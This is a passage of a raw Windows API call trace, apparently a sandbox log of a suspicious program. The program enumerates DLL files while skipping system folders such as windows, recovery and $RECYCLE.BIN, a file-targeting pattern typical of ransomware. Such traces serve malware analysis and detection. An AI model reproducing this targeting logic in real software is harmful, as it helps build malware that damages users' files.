nFileSizeLow=0x4cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2=".") returned 1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="..") returned 1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="...") returned 1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="windows") returned -1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="recovery") returned -1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.244] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="msocache") returned -1 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.244] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d9e0b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d9e0b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d9e0b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2=".") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="..") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="...") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="windows") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="recovery") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="msocache") returned -1 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0101.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0101.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0101.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0101.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.245] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ac3289, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ac3289, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2=".") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="..") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="...") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="windows") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="recovery") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.245] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="msocache") returned -1 [0101.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2412b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.246] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2=".") returned 1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="..") returned 1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="...") returned 1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="windows") returned -1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="recovery") returned -1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.246] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="msocache") returned -1 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0101.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.247] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34d6ecb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf34d6ecb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3b3f424, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2=".") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="..") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="...") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="windows") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="recovery") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="msocache") returned -1 [0101.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0101.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0101.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.247] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68b32cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68b32cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68b32cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2=".") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="..") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="...") returned 1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="windows") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="recovery") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.247] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.248] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.248] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="msocache") returned -1 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.248] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42b29f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3f6d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVFileSystemMetadata.dll", cAlternateFileName="APPVFI~1.DLL")) returned 1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2=".") returned 1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="..") returned 1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="...") returned 1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="windows") returned -1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="recovery") returned -1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="perflogs") returned -1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="documents and settings") returned -1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="system volume information") returned -1 [0101.248] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="msocache") returned -1 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x2411c8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 26 [0101.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 